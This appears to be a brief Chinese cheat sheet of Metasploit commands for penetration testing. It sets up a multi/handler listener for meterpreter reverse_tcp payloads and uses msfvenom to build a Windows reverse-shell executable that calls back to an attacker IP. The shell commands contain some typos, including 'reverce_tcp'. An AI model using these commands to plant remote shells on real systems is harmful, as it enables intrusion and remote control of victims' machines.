跳到主要内容

msf利用

msf利用

Reverse ==> 靶机反连攻击机 Bind ==> 攻击机直连靶机

handler -H 0.0.0.0 -P 4444 -p windows/x64/meterpreter/reverce_tcp
#利用msf监听模块 -H:监听攻击机ip -P:监听端口 -p:指定漏洞利用payload
#与上同理
msf6> use exploit/multi/handler #使用exploit/multi/handler通用监听模块
msf6> options #查看当前模块的配置信息(Required为yes则必须要配置)
msf6> set payload php/meterpreter/reverse_tcp #指定漏洞利用payload
msf6> set lhost 0.0.0.0
msf6> set lport 4444
msf6> show targets #查看payload支持的目标信息
msf6> run -j -z #运行模块并放到后台
msf6> back #退出模块
msf6> sessions #查看会话
msf6> session 1 #进入会话
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.12.160 lport=4444 -f exe -o rev.exe 
# -p:指定生成的远控payload,要与之前监听的payload一致 -lhost:指定靶机翻脸攻击机的ip地址 -lport:在hiding靶机反连攻击机的端口 -f:指定生成文件格式 -o:指定生成的文件名

乱码需要修改cmd窗口编码chcp 65001,修改回中文chcp 936